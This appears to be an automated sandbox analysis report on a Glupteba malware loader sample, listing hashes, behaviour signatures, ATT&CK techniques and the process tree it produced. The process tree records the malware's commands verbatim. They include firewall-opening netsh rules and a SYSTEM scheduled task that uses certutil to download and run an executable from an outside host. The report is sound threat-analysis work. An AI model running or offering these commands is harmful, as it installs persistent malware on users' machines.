Analysis

  • max time kernel
    170s
  • max time network
    190s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    09-05-2022 00:37

General

  • Target

    14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4.exe

  • Size

    3.8MB

  • MD5

    b6fbb67f74b6c04306858d6e94da633a

  • SHA1

    c86058edd6f70b373e2d1f1314e21dad72c8f236

  • SHA256

    14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4

  • SHA512

    78384dc86493ab25230eff3b6e2976e184a81eb9813910898654eeb68a9045bcc315904b5fb70f37c6aea22dcb1ffdd39d8b3e9b225a44daa8beb0b348fba01b

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4.exe
    "C:\Users\Admin\AppData\Local\Temp\14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4296
    • C:\Users\Admin\AppData\Local\Temp\14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4.exe
      "C:\Users\Admin\AppData\Local\Temp\14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:3912
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2248
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:5052
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:664
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3528
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:444
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3152
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1424

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        b6fbb67f74b6c04306858d6e94da633a

        SHA1

        c86058edd6f70b373e2d1f1314e21dad72c8f236

        SHA256

        14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4

        SHA512

        78384dc86493ab25230eff3b6e2976e184a81eb9813910898654eeb68a9045bcc315904b5fb70f37c6aea22dcb1ffdd39d8b3e9b225a44daa8beb0b348fba01b

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        b6fbb67f74b6c04306858d6e94da633a

        SHA1

        c86058edd6f70b373e2d1f1314e21dad72c8f236

        SHA256

        14067dc9e06b697e45cb1cfd87beef1389fac6157e5e0f9c3ffba1ca8c48afd4

        SHA512

        78384dc86493ab25230eff3b6e2976e184a81eb9813910898654eeb68a9045bcc315904b5fb70f37c6aea22dcb1ffdd39d8b3e9b225a44daa8beb0b348fba01b

      • memory/444-148-0x0000000000000000-mapping.dmp
      • memory/664-146-0x0000000000000000-mapping.dmp
      • memory/1096-145-0x0000000000400000-0x0000000005150000-memory.dmp
        Filesize

        77.3MB

      • memory/1096-140-0x0000000000000000-mapping.dmp
      • memory/1096-143-0x0000000005C00000-0x0000000005FA9000-memory.dmp
        Filesize

        3.7MB

      • memory/1096-144-0x0000000006000000-0x00000000066FC000-memory.dmp
        Filesize

        7.0MB

      • memory/1612-135-0x0000000000400000-0x0000000005150000-memory.dmp
        Filesize

        77.3MB

      • memory/1612-134-0x00000000055F8000-0x00000000059A1000-memory.dmp
        Filesize

        3.7MB

      • memory/1612-133-0x0000000000000000-mapping.dmp
      • memory/2248-138-0x0000000000000000-mapping.dmp
      • memory/3152-150-0x0000000000000000-mapping.dmp
      • memory/3528-147-0x0000000000000000-mapping.dmp
      • memory/3672-136-0x0000000000000000-mapping.dmp
      • memory/3912-137-0x0000000000000000-mapping.dmp
      • memory/4296-130-0x000000000570A000-0x0000000005AB3000-memory.dmp
        Filesize

        3.7MB

      • memory/4296-132-0x0000000000400000-0x0000000005150000-memory.dmp
        Filesize

        77.3MB

      • memory/4296-131-0x0000000005AC0000-0x00000000061BC000-memory.dmp
        Filesize

        7.0MB

      • memory/5052-139-0x0000000000000000-mapping.dmp